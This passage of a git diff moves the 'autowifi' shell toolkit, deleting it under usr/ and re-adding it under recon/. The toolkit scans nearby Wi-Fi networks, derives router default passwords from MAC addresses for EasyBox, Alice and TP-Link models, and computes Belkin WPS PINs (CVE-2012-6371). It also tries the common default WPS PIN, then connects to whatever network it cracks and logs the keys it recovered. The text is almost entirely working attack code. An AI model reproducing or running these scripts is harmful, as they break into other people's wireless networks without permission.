up to 4 places with zeros, if necessary: + deci=$(printf "%04d" "0x${MAC:8:4}" | sed 's/.*\(....\)/\1/;s/./& /g') + # + # The digits M9 to M12 are just the last digits (9.-12.) of the MAC: + hexi=$(echo ${MAC:8:4} | sed 's/./& /g') + #echo 'M4 (Hex): ' ${hexi[@]} + # K1 = last byte of (d0 + d1 + h2 + h3) + # K2 = last byte of (h0 + h1 + d2 + d3) + c1=$(printf "%d + %d + %d + %d" ${deci:0:1} ${deci:2:1} 0x${hexi:4:1} 0x${hexi:6:1}) + c2=$(printf "%d + %d + %d + %d" 0x${hexi:0:1} 0x${hexi:2:1} ${deci:4:1} ${deci:6:1}) + K1=$((($c1)%16)) + K2=$((($c2)%16)) + #printf "K1: %x\n" $K1 + #printf "K2: %x\n" $K2 + X1=$((K1^${deci:6:1})) + X2=$((K1^${deci:4:1})) + X3=$((K1^${deci:2:1})) + Y1=$((K2^0x${hexi:2:1})) + Y2=$((K2^0x${hexi:4:1})) + Y3=$((K2^0x${hexi:6:1})) + Z1=$((0x${hexi:4:1}^${deci:6:1})) + Z2=$((0x${hexi:6:1}^${deci:4:1})) + Z3=$((K1^K2)) + printf "%x%x%x%x%x%x%x%x%x\n" $X1 $Y1 $Z1 $X2 $Y2 $Z2 $X3 $Y3 $Z3 | tr a-f A-F +fi diff --git a/recon/autowifi/usr/lib/autowifi/plugins/02tplink b/recon/autowifi/usr/lib/autowifi/plugins/02tplink new file mode 100755 index 00000000..b2b96f95 --- /dev/null +++ b/recon/autowifi/usr/lib/autowifi/plugins/02tplink @@ -0,0 +1,17 @@ +#!/bin/sh +# Implementation of TP-Link default WPA Key +# Based on +# http://www.wardriving-forum.de/forum/f321/ezwlan-android-2-1-a-70045-4.html#post342481 + +cd $(dirname $(readlink -f $0)) +. ../lib/plugin_core + +parse_plugin_args "$@" + +! check_vendor_mac $VENDOR_MAC "F8D111" && echo "$VENDOR_MAC not affected" && exit 1 +! echo $ESSID | egrep -q '^tp' && echo "$ESSID not affected" && exit 1 + + +# printf always makes string to lower, need that for correct md5sum +printf ${MAC:4:12} +exit 0 diff --git a/recon/autowifi/usr/lib/autowifi/plugins/11belkin_wps b/recon/autowifi/usr/lib/autowifi/plugins/11belkin_wps new file mode 100755 index 00000000..d4eb8e37 --- /dev/null +++ b/recon/autowifi/usr/lib/autowifi/plugins/11belkin_wps @@ -0,0 +1,40 @@ +#!/bin/sh +# thanks to http://ednolo.alumnos.upv.es/?p=1295G +# for the PoC code +# Calculates the default WPS pin of Belkin Routers and returns the WPA key +# +# Implementation of CVE-2012-6371 + +# works : +# Belkin_N+_XXXXXX 00:22:75:XX:XX:XX F5D8235-4 v1000 +# belkin.XXX 00:1C:DF:XX:XX:XX F5D8231-4 v5000 +# belkin.XXX 09:86:3B:XX:XX:XX F9K1104 v1000 + +cd $(dirname $(readlink -f $0)) +. ../lib/plugin_core +. ../lib/wps +parse_plugin_args "$@" + +check_painmode + +! check_vendor_mac "$VENDOR_MAC" 002275 001CDF 09863B && echo "VENDOR MAC $VENDOR_MAC not affected" && exit 1 + +calc_belkin(){ + PRIVATE_MAC=${1} + + p=$((0x$PRIVATE_MAC % 10000000)) + wps_pin_checksum(){ + pin=$1 + accum=0 + while [ $pin -ne 0 ];do + accum=$((accum + (3 * (pin % 10)) )) + pin=$((pin/10)) + accum=$((accum + pin %10 )) + pin=$((pin/10)) + done + echo $(( (10 - accum % 10) % 10)) + } + printf "%07d%d" $p $(wps_pin_checksum $p) + return 0 +} +try_wps_pin $@ $(calc_belkin ${PRIVATE_MAC}) diff --git a/recon/autowifi/usr/lib/autowifi/plugins/30default_wps b/recon/autowifi/usr/lib/autowifi/plugins/30default_wps new file mode 100755 index 00000000..50ad2676 --- /dev/null +++ b/recon/autowifi/usr/lib/autowifi/plugins/30default_wps @@ -0,0 +1,18 @@ +#!/bin/sh +# on MANY WPS-enabled devices the pin is 12345670 , so we can give it a shot +# http://www.wotan.cc/?p=75 +cd $(dirname $(readlink -f $0)) +. ../lib/wps +. ../lib/plugin_core + +parse_plugin_args "$@" +check_painmode +DEFAULT_PIN="${DEFAULT_PIN:-12345670}" + +if has_wps "$ENC"; then + echo "trying PIN $DEFAULT_PIN against $ESSID" >&2 + try_wps_pin "$@" $DEFAULT_PIN +else + echo "Network $ESSID not WPS enabled" + exit 1 +fi diff --git a/usr/bin/autowifi b/usr/bin/autowifi deleted file mode 100755 index 6b9a090c..00000000 --- a/usr/bin/autowifi +++ /dev/null @@ -1,177 +0,0 @@ -#!/bin/sh -cd $(dirname $(readlink -f $0)) - - -interface=${interface:-wlan0} -root=${root:-../../} -crackdir=$root/usr/lib/autowifi/plugins -wifi_keys=$root/etc/autowifi/wifi_keys -wifi_log=$root/var/log/autowifi.log -painmode=${painmode:-} - -# exists() run_hooks() -. $root/usr/lib/autowifi/lib/core - - -. $root/usr/lib/autowifi/lib/network - -# start_wpa_supplicant() -. $root/usr/lib/autowifi/lib/wpa_supplicant - - -connect(){ - #mac ssid encryption key - - run_hooks interface pre - run_hooks profile pre - - connect_wifi "$@" - - ip_start dhcp - - if check_gateway && check_internet; then - echo yay internet >&2 - - run_hooks interface post - run_hooks profile post - - write_profile "$@" - return 0 - fi - return 1 -} -write_profile(){ - bandw=$(check_bandwidth) - ( cat $wifi_keys | grep -v '^#' | grep -v "|$1|" ; echo "$2|$1|$bandw|$4" ) | ( echo "#SSID|MAC|BANDWIDTH|KEY";sort )| uniq > "${wifi_keys}2" - mv "${wifi_keys}2" "$wifi_keys" -} - - -find_count_of_ssid(){ - c=0 - for i in `seq 1 $WIFI_COUNT`; do - eval SSID=\${ESSID_${i}} - if [ "$SSID" = "$1" ]; then - c+=1 - echo "$i" - fi - done - if [ $c -eq 0 ];then - exit 1 - fi - exit 0 -} - - -connect_to_network_by_ssid(){ - find_count_of_ssid "$1" | (while read i - do - loop_over_cracks "$i" && exit 0 - done;exit 1) - if [ $? -eq 0 ]; then - exit 0 - fi - echo "no network found :(" - exit 1 -} - -connect_with_pw(){ - find_count_of_ssid "$1" | (while read i - do - KEY="$2" - eval connect \"\${MAC_${i}}\" \"\${ESSID_${i}}\" \${ENCRYPTION_${i}} \"\${KEY}\" - if [ $? -eq 0 ]; then - exit 0 - fi - done;exit 1) -} -wifi_init(){ - wpa_supplicant_is_usable || start_wpa_supplicant /tmp/autowifi.wpa_supplicant - wifi_scan > /tmp/${interface}.scan - . /tmp/${interface}.scan -} -loop_over_networks(){ - - wifi_init - for i in `seq 1 $WIFI_COUNT`; do - loop_over_cracks "$i" - if [ $? -eq 0 ]; then - return 0 - fi - done -} - -loop_over_cracks(){ - i=$1 - KEY='' - for crack in $(find $crackdir -type f | sort -u); do - KEY="$(eval root=$root painmode=$painmode \$crack \"\${ESSID_${i}}\" \"\${MAC_${i}}\" \${FREQ_${i}} \${ENCRYPTION_${i}})" - if [ $? -eq 0 ]; then - eval connect \"\${MAC_${i}}\" \"\${ESSID_${i}}\" \${ENCRYPTION_${i}} \"\${KEY}\" - if [ $? -eq 0 ]; then - return 0 - fi - fi - done - return 1 -} -loop_cracks_over_networks(){ - wifi_init - for crack in $(find $crackdir -type f | sort -u); do - for i in `seq 1 $WIFI_COUNT`; do - KEY="$(eval root=$root \$crack \"\${ESSID_${i}}\" \"\${MAC_${i}}\" \${FREQ_${i}} \${ENCRYPTION_${i}})" - if [ $? -eq 0 ]; then - eval connect \"\${MAC_${i}}\" \"\${ESSID_${i}}\" \${ENCRYPTION_${i}} \"\${KEY}\" - if [ $? -eq 0 ]; then - return 0 - fi - fi - done - done - -} - -#scan_all(){ -# for i in `seq 1 $WIFI_COUNT`; do -# loop_over_cracks $i -# done -#} -# -#scan_unscanned(){ -# find_unscanned_networks | (while read i -# do -# loop_over_cracks $i -# done) -#} - -#find_unscanned_networks(){ -# #TODO broken -# for i in `seq 1 $WIFI_COUNT`; do -# eval SSID=\${ESSID_${i}} -# eval MAC=\${MAC_${i}} -# cat $wifi_stats 2>/dev/null | (while IFS='|' read SSID MAC BANDW KEY; do -# if [ "$1" = "$SSID" -a "$2" = "$MAC" ]; then -# continue -# fi -# done; echo $i) -# done -# exit 0 -#} - -wifi_init -if [ -n "$2" ]; then - echo connecting to $1 with pw $2 - connect_with_pw "$1" "$2" -elif [ -n "$1" ]; then - echo connecting to $1 - connect_to_network_by_ssid "$1" -else - echo looping network now - check_internet || loop_cracks_over_networks - - while sleep 10; do - if ! check_gateway; then - loop_cracks_over_networks - fi - done -fi diff --git a/usr/bin/autowifi_old b/usr/bin/autowifi_old deleted file mode 100755 index 55eaefcd..00000000 --- a/usr/bin/autowifi_old +++ /dev/null @@ -1,65 +0,0 @@ -#!/bin/sh -x -# States (LED): -# Blinking - running wifi plugins -# Turned off - connected to wifi -# Turned on - waiting for next scan round - -wifi=wlan0 -iface=@wifi-iface[0] -radio=$(uci get wireless.${iface}.device) - -# for connect_wifi -. /usr/lib/autowifi/lib/openwrt - -# for iwlist_scan -. /usr/lib/autowifi/lib/iwlist - -# for check_internet and check_gateway -. /usr/lib/autowifi/lib/network - -crack_wifi(){ - #SSID MAC CHANNEL ENCRYPTION WPA WPA2 - all_led timer - if [ "$4" == off ];then - encr=open - elif [ "$6" -eq 1 ]; then - encr=psk2 - elif [ "$5" -eq 1 ]; then - encr=psk - elif [ "$4" == on ]; then - encr=wep - fi - for hack in $(find /usr/lib/autowifi/plugins -type f); do - key=$($hack "$@"); - ret=$? - if [ $ret -eq 0 ];then - connect_wifi "$3" "$1" $encr "$key" - sleep 20 - if check_gateway; then - (cat /etc/autowifi/wifi_keys | grep -v "$1|$2|" ; echo "$1|$2|$key" ) | sort | uniq > /etc/autowifi/wifi_keys2 - mv /etc/autowifi/wifi_keys2 /etc/autowifi/wifi_keys - echo "yay gateway" - check_internet && all_led none && return 0 - fi - fi - done - return 1 -} -loop_over_networks(){ - . /tmp/${wifi}.scan - for i in `seq 1 $WIFI_COUNT`; do - eval grep -q \${MAC_${i}} /etc/autowifi/blacklist && continue - eval crack_wifi \"\${ESSID_${i}}\" \"\${MAC_${i}}\" \${CHANNEL_${i}} \${ENCRYPTION_${i}} \${WPA_${i}} \${WPA2_${i}} && break - done -} - -iwlist_scan > /tmp/${wifi}.scan -loop_over_networks - -while sleep 60; do - if ! check_internet; then - all_led on - iwlist_scan > /tmp/${wifi}.scan - loop_over_networks - fi -done diff --git a/usr/bin/inspector_wifi b/usr/bin/inspector_wifi deleted file mode 100755 index 17818b44..00000000 --- a/usr/bin/inspector_wifi +++ /dev/null @@ -1,75 +0,0 @@ -#!/bin/sh -# Usage; sudo iwlist wlan0 scan | ./inspector_wifi -# -# -set -eu - -cd "$(dirname "$(readlink -f "$0")")" -echo "waiting for iwlist scan data..." >&2 - -crack_wifi(){ - for i in ../lib/autowifi/plugins/*;do - if RET=$(./$i "$@" 2>/dev/null);then - echo "$@ - with crack $i succeeded - Key is $RET" - fi - done -} - -shell_escape(){ - sed 's/./\\&/g' -} -remove_quotes(){ - sed 's/^"\|"$//g' -} - - -iwlist_scan_parser(){ - count=0 - while read line; - do - case "$line" in - - *"Cell "*) - if [ $count -ne 0 ];then - crack_wifi "$ESSID" $MAC $CHANNEL any_encryption - fi - WPA=0 - WPA2=0 - : $((count+=1)) - MAC=${line#*Address: } - ;; - *Channel:*) - CHANNEL=${line#*:} - ;; - *Quality=*) - QUALITY="`printf '%s' ${line#*Quality=} | cut -d/ -f 1`" - ;; - *"Encryption key:"*) - ENCRYPTION=${line#*key:} - ;; - *ESSID:*) - ESSID=$(echo "${line#*ESSID:}" | remove_quotes) - ;; - *"IE: IEEE 802.11i/WPA2"*) - WPA2=1 - ;; - *"IE: WPA Version 1"*) - WPA=1 - ;; - *);; #important, do not delete! - esac - done; - crack_wifi "$ESSID" $MAC $CHANNEL any_encryption - echo WIFI_COUNT=$count -} - -wifi_init(){ - iwlist_scan_parser -} - -loop_networks(){ - for i in `seq 1 $WIFI_COUNT`; do - loop_over_cracks "$i" - done -} -wifi_init diff --git a/usr/bin/iwlist_env b/usr/bin/iwlist_env deleted file mode 100755 index 29112ff3..00000000 --- a/usr/bin/iwlist_env +++ /dev/null @@ -1,33 +0,0 @@ -#!/bin/sh - -count=0 - -iwlist scan ${1:-} 2>/dev/null | ( while read line; -do - case "$line" in - *"Cell "*) - #echo - : $((count+=1)) - echo MAC_${count}="${line#*Address: }" - ;; - *Channel:*) - echo CHANNEL_${count}="${line#*:}" - ;; - *Quality=*) - echo QUALITY_${count}="`printf '%s' ${line#*Quality=} | cut -d/ -f 1`" - ;; - *"Encryption key:"*) - echo ENCRYPTION_${count}="${line#*key:}" - ;; - *ESSID:*) - echo ESSID_${count}="${line#*ESSID:}" - ;; - *"IE: IEEE 802.11i/WPA2"*) - echo WPA2_${count}=1 - ;; - *"IE: WPA Version 1"*) - echo WPA_${count}=1 - ;; - *);; - esac -done; echo WIFI_COUNT=$count) diff --git a/usr/lib/autowifi/lib/core b/usr/lib/autowifi/lib/core deleted file mode 100644 index 80ae75b4..00000000 --- a/usr/lib/autowifi/lib/core +++ /dev/null @@ -1,20 +0,0 @@ -#!/bin/sh - -exists() { type "$1" >/dev/null 2>/dev/null; } - -run_hooks(){ - # (interface|profile) (pre|post) - typ=$1 - action=$2 - shift;shift - : ${interface?please provide interface} - if [ "$typ" = "interface" ];then - path=interface/$interface/$action - else - path=profile/$2/$action - fi - for hook in $(find "$root/etc/autowifi/hooks/$path" -type f 2>/dev/null | sort -u ); do - $hook "$@" - done -} - diff --git a/usr/lib/autowifi/lib/iwlist b/usr/lib/autowifi/lib/iwlist deleted file mode 100644 index a9f77f0c..00000000 --- a/usr/lib/autowifi/lib/iwlist +++ /dev/null @@ -1,55 +0,0 @@ -#!/bin/sh - -print_iwlist_env(){ - # takes environment: - # count - # MAC - # CHANNEL - # QUALITY - # ENCRYPTION - # ESSID - # WPA - # WPA2 - for i in ESSID MAC CHANNEL QUALITY ENCRYPTION WPA WPA2;do - eval echo ${i}_${count}=\$${i} - done -} - -iwlist_scan(){ - # usage: iwlist_scan $wifi-itf - ifconfig $wifi up - - count=0 - - iwlist ${1:-} scan 2>/dev/null | ( while read line; - do - case "$line" in - *"Cell "*) - [ $count -eq 0 ] || print_iwlist_env - WPA=0 - WPA2=0 - : $((count+=1)) - MAC="${line#*Address: }" - ;; - *Channel:*) - CHANNEL="${line#*:}" - ;; - *Quality=*) - QUALITY="`printf '%s' ${line#*Quality=} | cut -d/ -f 1`" - ;; - *"Encryption key:"*) - ENCRYPTION="${line#*key:}" - ;; - *ESSID:*) - ESSID="${line#*ESSID:}" - ;; - *"IE: IEEE 802.11i/WPA2"*) - WPA2=1 - ;; - *"IE: WPA Version 1"*) - WPA=1 - ;; - *);; - esac - done; print_iwlist_env ;echo WIFI_COUNT=$count) -} diff --git a/usr/lib/autowifi/lib/network b/usr/lib/autowifi/lib/network deleted file mode 100644 index a0105120..00000000 --- a/usr/lib/autowifi/lib/network +++ /dev/null @@ -1,40 +0,0 @@ -#!/bin/sh - -check_gateway(){ - ping -c 1 -w 5 $(ip route | awk '/default/{print $3}') >/dev/null -} -check_internet(){ - # TODO determine the loader, either wget or curl - secret=$(wget -O- http://krebsco.de/secret 2>/dev/null) - if [ "$secret" == "1337" ]; then - return 0 - else - echo "cannot load secret or secret incorrect" >&2 - return 1 - fi -} - -check_bandwidth(){ - echo $(curl http://www.microsoft.com/africa/4afrika/images/infographic.gif -w "%{speed_download}" -o /dev/null 2>/dev/null | sed 's/\..*//') -} - -ip_start(){ - : ${interface?interface variable not set} ${1?please provide method to start ip} - # usage: method [extra parms] - case "$1" in - dhcp) - if exists dhcpcd; then - dhcpcd -x $interface - dhcpcd -w -A $interface - elif exists dhclient; then - dhclient -x $interface - dhclient $interface - elif exists udhcpc; then - PIDFILE=/var/run/udhcpc-${interface}.pid - [ -e $PIDFILE ] && kill `cat $PIDFILE` ||: - udhcpc -n -p $PIDFILE -i $interface -s \ - "$root/usr/lib/autowifi/opt/udhcpc.run" - fi ;; - *) echo "do not know ip starter $1" >&2;; - esac -} diff --git a/usr/lib/autowifi/lib/openwrt b/usr/lib/autowifi/lib/openwrt deleted file mode 100644 index 3483c1fe..00000000 --- a/usr/lib/autowifi/lib/openwrt +++ /dev/null @@ -1,18 +0,0 @@ -#!/bin/sh -connect_wifi(){ - # channel ssid encryption key - uci set wireless.${iface}.mode=sta - - ifconfig $wifi up - uci set wireless.${radio}.channel=$1 - uci set "wireless.${iface}.ssid=$2" - if [ $3 == "none" ] ; then - uci set wireless.${iface}.encryption=none - uci -q delete wireless.${iface}.key - else - uci set "wireless.${iface}.key=$4" - uci set wireless.${iface}.encryption=$3 - fi - uci commit wireless - wifi up -} diff --git a/usr/lib/autowifi/lib/plugin_core b/usr/lib/autowifi/lib/plugin_core deleted file mode 100644 index e79a3c05..00000000 --- a/usr/lib/autowifi/lib/plugin_core +++ /dev/null @@ -1,41 +0,0 @@ -#!/bin/sh -parse_plugin_args(){ - [ $# -ne 4 ] && plugin_usage && exit 1 - # convenience function to put args in ENV variables - ESSID="$1" - - # mac is returned without colon - MAC=$(printf "%s" "$2" | sed 's/://g') - # split up the mac address to vendor and private part - VENDOR_MAC=${MAC:0:6} - PRIVATE_MAC=${MAC:6:12} - CHANNEL="$3" - ENC="$4" - if [ ${#MAC} -ne 12 ] ;then - echo "MAC malformed" - exit 1 - fi -} -plugin_usage(){ - cat << EOF -usage: $0 ESSID MAC CHANNEL ENC" - - ESSID - string - MAC - 00:11:22:33:44:55 - CHANNEL - 4 - ENC - wpa -EOF - -} - -check_vendor_mac(){ - needle="$(printf $1 | tr '[A-Z]' '[a-z]')" - shift - for i in "$@";do - [ "$needle" == "$(printf $i | tr '[A-Z]' '[a-z]')" ] && return 0 - done - return 1 -} -check_painmode(){ - test -z "${painmode:-}" && echo "painmode required" && exit 1 -} diff --git a/usr/lib/autowifi/lib/wpa_supplicant b/usr/lib/autowifi/lib/wpa_supplicant deleted file mode 100644 index df9c2155..00000000 --- a/usr/lib/autowifi/lib/wpa_supplicant +++ /dev/null @@ -1,59 +0,0 @@ -#!/bin/sh -start_wpa_supplicant(){ - wpa_conf=${1?please supply wpa_supplicant.conf path} - killall wpa_supplicant - sleep 1 -cat>$wpa_conf</dev/null - sleep 10 - - wpa_cli scan_results 2>/dev/null | egrep "^..:" | sed 's/ / /g' | (while IFS=' ' read MAC FREQ QUALITY ENCRYPTION ESSID - do - : $((count+=1)) - print_wifi_env - - done; echo WIFI_COUNT=$count) -} - -print_wifi_env(){ - # takes environment: - # MAC - # FREQ - # QUALITY - # ENCRYPTION - # ESSID - for i in MAC FREQ QUALITY ENCRYPTION ESSID;do - eval echo ${i}_${count}=\\\"\$"${i}"\\\" - done -} -wpa_supplicant_is_usable(){ - wpa_cli status >/dev/null 2>&1 -} diff --git a/usr/lib/autowifi/lib/wps b/usr/lib/autowifi/lib/wps deleted file mode 100644 index 5e9bbda7..00000000 --- a/usr/lib/autowifi/lib/wps +++ /dev/null @@ -1,84 +0,0 @@ -#!/bin/sh -has_wps(){ - # the-wpa_supplicant-encryption-string - echo "$1" | grep -q "\[WPS\]" -} -try_wps_pin(){ - # - # ESSID MAC CHANNEL ENC WPA WPA2 PIN - #set -ef - ESSID="$1" - MAC="$2" - CHANNEL="$3" - - # TODO refactor to use all the encryption - # the wpa_supplicant encryption string - ENC="$4" - - PIN="$5" - - [ "$ENC" == "[ESS]" ] && return 2 - WPA_CONF=/tmp/wpa_trywps.conf - WPA_LOG=/tmp/wpa_trywps.log - rm $WPA_LOG - #mkfifo $WPA_LOG - killall wpa_supplicant 2>/dev/null && sleep 1 - - cat > $WPA_CONF <&1 & - WPA_PID=$! - sleep 2 - if !(sudo wpa_cli wps_reg $MAC $PIN | grep -q OK) ;then - echo "wpa_cli wps_reg failed, bailing out!" - return 1 - fi - - # association failed - # exit 1 ;; - # TODO probably not posix compatible... - timeout(){ - ( timeout=10; - while [ $timeout -gt 0 ]; do - sleep 1; - kill -0 $$ 2> /dev/null || exit 0; - : $((timeout--)); - done ; - echo "TIMEOUT REACHED" ; - kill $$)& - exec $@ - } - - if ( timeout tail -f $WPA_LOG & echo "TAILPID: $!") | while read line ; do - bye(){ - printf "%s:" "$2" >&2 - kill $WPA_PID - kill -HUP $TAILPID - exit $1 - } - # DEBUG - #echo $line >&2 - case "$line" in - TAILPID:*)IFS=" " set -- $line; TAILPID=$2;; - *"WPS-FAIL msg=10 config_error=18"*) bye 1 "wrong pin";; - *"CTRL-EVENT-EAP-FAILURE EAP authentication failed"*) bye 1 "rate limiting";; - #*"Association request to the driver failed") bye 1 "wps not available";; - #*CTRL-EVENT-DISCONNECTED*):;; - *"CTRL-EVENT-DISCONNECTED bssid="*"reason=3 locally_generated=1"*)bye 1 "authentication failed, wps deactivated?";; - "TIMEOUT REACHED")bye 1 "timeout reached";; - *CTRL-EVENT-TERMINATING*) bye 1 "wpa_supplicant died";; - *CTRL-EVENT-CONNECTED*) bye 0 "yay connected";; - esac - done ; then - #echo "Connected!" - sed -n 's/[ \t]*psk="\(.*\)"$/\1/p' "$WPA_CONF" - return 0 - else - #echo "failed!" - return 1 - fi - -} diff --git a/usr/lib/autowifi/opt/udhcpc.run b/usr/lib/autowifi/opt/udhcpc.run deleted file mode 100755 index 2e1b919f..00000000 --- a/usr/lib/autowifi/opt/udhcpc.run +++ /dev/null @@ -1,70 +0,0 @@ -#!/bin/sh -# shamelessly stolen from http://www.doit.org/udhcpc/S50default - -PATH=/bin:/usr/bin:/sbin:/usr/sbin - -RESOLV_CONF="/etc/resolv.conf" - -update_interface() -{ - [ -n "$broadcast" ] && BROADCAST="broadcast $broadcast" - [ -n "$subnet" ] && NETMASK="netmask $subnet" - ifconfig $interface $ip $BROADCAST $NETMASK -} - -update_routes() -{ - if [ -n "$router" ] - then - echo "deleting routes" - while route del default gw 0.0.0.0 dev $interface - do : - done - - for i in $router - do - route add default gw $i dev $interface - done - fi -} - -update_dns() -{ - echo -n > $RESOLV_CONF - [ -n "$domain" ] && echo domain $domain >> $RESOLV_CONF - for i in $dns - do - echo adding dns $i - echo nameserver $i >> $RESOLV_CONF - done -} - -deconfig() -{ - ifconfig $interface 0.0.0.0 -} - -case "$1" in - bound) - update_interface; - update_routes; - update_dns; - ;; - - renew) - update_interface; - update_routes; - update_dns; - ;; - - deconfig) - deconfig; - ;; - - *) - echo "Usage: $0 {bound|renew|deconfig}" - exit 1 - ;; -esac - -exit 0 diff --git a/usr/lib/autowifi/plugins/00profile b/usr/lib/autowifi/plugins/00profile deleted file mode 100755 index d7fb9c75..00000000 --- a/usr/lib/autowifi/plugins/00profile +++ /dev/null @@ -1,11 +0,0 @@ -#!/bin/sh -#ESSID MAC CHANNEL ENCRYPTION WPA WPA2 -# ENV: -# root (default: /) -root=${root:-/} -cat $root/etc/autowifi/wifi_keys 2>/dev/null | (while IFS='|' read SSID MAC BANDWIDTH KEY; do - if [ "$1" == "$SSID" -a "$2" == "$MAC" ]; then - echo $KEY - exit 0 - fi -done; exit 1) diff --git a/usr/lib/autowifi/plugins/01open b/usr/lib/autowifi/plugins/01open deleted file mode 100755 index 881f47ea..00000000 --- a/usr/lib/autowifi/plugins/01open +++ /dev/null @@ -1,6 +0,0 @@ -#!/bin/sh -#ESSID MAC CHANNEL ENCRYPTION -if [ "$4" == "[ESS]" ]; then - exit 0 -fi -exit 1 diff --git a/usr/lib/autowifi/plugins/02alice b/usr/lib/autowifi/plugins/02alice deleted file mode 100755 index 1b4533a4..00000000 --- a/usr/lib/autowifi/plugins/02alice +++ /dev/null @@ -1,20 +0,0 @@ -#!/bin/sh -# Implementation of Alicebox 1121 /Siemens S1621-Z220-A Default Password Algorithm: -# Based on Poc from -# http://www.wardriving-forum.de/forum/f275/standard-wlanpassw%F6rter-von-alice-boxen-70287.html -# -# -# ESSID MAC CHANNEL ENCRYPTION - -cd $(dirname $(readlink -f $0)) -. ../lib/plugin_core - -parse_plugin_args "$@" - -! check_vendor_mac $VENDOR_MAC "00255E" && echo "$VENDOR_MAC not affected" && exit 1 - -# printf always makes string to lower, need that for correct md5sum -ETHMAC=$( printf "%012x" $((0x${MAC}-1)) ) -TMP=$(printf $ETHMAC | md5sum) -printf ${TMP:0:12} | base64 -exit 0 diff --git a/usr/lib/autowifi/plugins/02easybox b/usr/lib/autowifi/plugins/02easybox deleted file mode 100755 index 3d7cb8c1..00000000 --- a/usr/lib/autowifi/plugins/02easybox +++ /dev/null @@ -1,37 +0,0 @@ -#!/bin/sh -#ESSID MAC CHANNEL ENCRYPTION WPA WPA2 - -cd $(dirname $(readlink -f $0)) -. ../lib/plugin_core -parse_plugin_args "$@" - -if ! echo "$ESSID" | egrep -i "(EasyBox-|Arcor-|Vodafone-)" >/dev/null; then - echo "Essid $ESSID is not Default EasyBox|Arcor|Vodafone" - exit 1 -else - - # Fill up to 4 places with zeros, if necessary: - deci=$(printf "%04d" "0x${MAC:8:4}" | sed 's/.*\(....\)/\1/;s/./& /g') - # - # The digits M9 to M12 are just the last digits (9.-12.) of the MAC: - hexi=$(echo ${MAC:8:4} | sed 's/./& /g') - #echo 'M4 (Hex): ' ${hexi[@]} - # K1 = last byte of (d0 + d1 + h2 + h3) - # K2 = last byte of (h0 + h1 + d2 + d3) - c1=$(printf "%d + %d + %d + %d" ${deci:0:1} ${deci:2:1} 0x${hexi:4:1} 0x${hexi:6:1}) - c2=$(printf "%d + %d + %d + %d" 0x${hexi:0:1} 0x${hexi:2:1} ${deci:4:1} ${deci:6:1}) - K1=$((($c1)%16)) - K2=$((($c2)%16)) - #printf "K1: %x\n" $K1 - #printf "K2: %x\n" $K2 - X1=$((K1^${deci:6:1})) - X2=$((K1^${deci:4:1})) - X3=$((K1^${deci:2:1})) - Y1=$((K2^0x${hexi:2:1})) - Y2=$((K2^0x${hexi:4:1})) - Y3=$((K2^0x${hexi:6:1})) - Z1=$((0x${hexi:4:1}^${deci:6:1})) - Z2=$((0x${hexi:6:1}^${deci:4:1})) - Z3=$((K1^K2)) - printf "%x%x%x%x%x%x%x%x%x\n" $X1 $Y1 $Z1 $X2 $Y2 $Z2 $X3 $Y3 $Z3 | tr a-f A-F -fi diff --git a/usr/lib/autowifi/plugins/02tplink b/usr/lib/autowifi/plugins/02tplink deleted file mode 100755 index b2b96f95..00000000 --- a/usr/lib/autowifi/plugins/02tplink +++ /dev/null @@ -1,17 +0,0 @@ -#!/bin/sh -# Implementation of TP-Link default WPA Key -# Based on -# http://www.wardriving-forum.de/forum/f321/ezwlan-android-2-1-a-70045-4.html#post342481 - -cd $(dirname $(readlink -f $0)) -. ../lib/plugin_core - -parse_plugin_args "$@" - -! check_vendor_mac $VENDOR_MAC "F8D111" && echo "$VENDOR_MAC not affected" && exit 1 -! echo $ESSID | egrep -q '^tp' && echo "$ESSID not affected" && exit 1 - - -# printf always makes string to lower, need that for correct md5sum -printf ${MAC:4:12} -exit 0 diff --git a/usr/lib/autowifi/plugins/11belkin_wps b/usr/lib/autowifi/plugins/11belkin_wps deleted file mode 100755 index d4eb8e37..00000000 --- a/usr/lib/autowifi/plugins/11belkin_wps +++ /dev/null @@ -1,40 +0,0 @@ -#!/bin/sh -# thanks to http://ednolo.alumnos.upv.es/?p=1295G -# for the PoC code -# Calculates the default WPS pin of Belkin Routers and returns the WPA key -# -# Implementation of CVE-2012-6371 - -# works : -# Belkin_N+_XXXXXX 00:22:75:XX:XX:XX F5D8235-4 v1000 -# belkin.XXX 00:1C:DF:XX:XX:XX F5D8231-4 v5000 -# belkin.XXX 09:86:3B:XX:XX:XX F9K1104 v1000 - -cd $(dirname $(readlink -f $0)) -. ../lib/plugin_core -. ../lib/wps -parse_plugin_args "$@" - -check_painmode - -! check_vendor_mac "$VENDOR_MAC" 002275 001CDF 09863B && echo "VENDOR MAC $VENDOR_MAC not affected" && exit 1 - -calc_belkin(){ - PRIVATE_MAC=${1} - - p=$((0x$PRIVATE_MAC % 10000000)) - wps_pin_checksum(){ - pin=$1 - accum=0 - while [ $pin -ne 0 ];do - accum=$((accum + (3 * (pin % 10)) )) - pin=$((pin/10)) - accum=$((accum + pin %10 )) - pin=$((pin/10)) - done - echo $(( (10 - accum % 10) % 10)) - } - printf "%07d%d" $p $(wps_pin_checksum $p) - return 0 -} -try_wps_pin $@ $(calc_belkin ${PRIVATE_MAC}) diff --git a/usr/lib/autowifi/plugins/30default_wps b/usr/lib/autowifi/plugins/30default_wps deleted file mode 100755 index 50ad2676..00000000 --- a/usr/lib/autowifi/plugins/30default_wps +++ /dev/null @@ -1,18 +0,0 @@ -#!/bin/sh -# on MANY WPS-enabled devices the pin is 12345670 , so we can give it a shot -# http://www.wotan.cc/?p=75 -cd $(dirname $(readlink -f $0)) -. ../lib/wps -. ../lib/plugin_core - -parse_plugin_args "$@" -check_painmode -DEFAULT_PIN="${DEFAULT_PIN:-12345670}" - -if has_wps "$ENC"; then - echo "trying PIN $DEFAULT_PIN against $ESSID" >&2 - try_wps_pin "$@" $DEFAULT_PIN -else - echo "Network $ESSID not WPS enabled" - exit 1 -fi -- cgit v1.2.3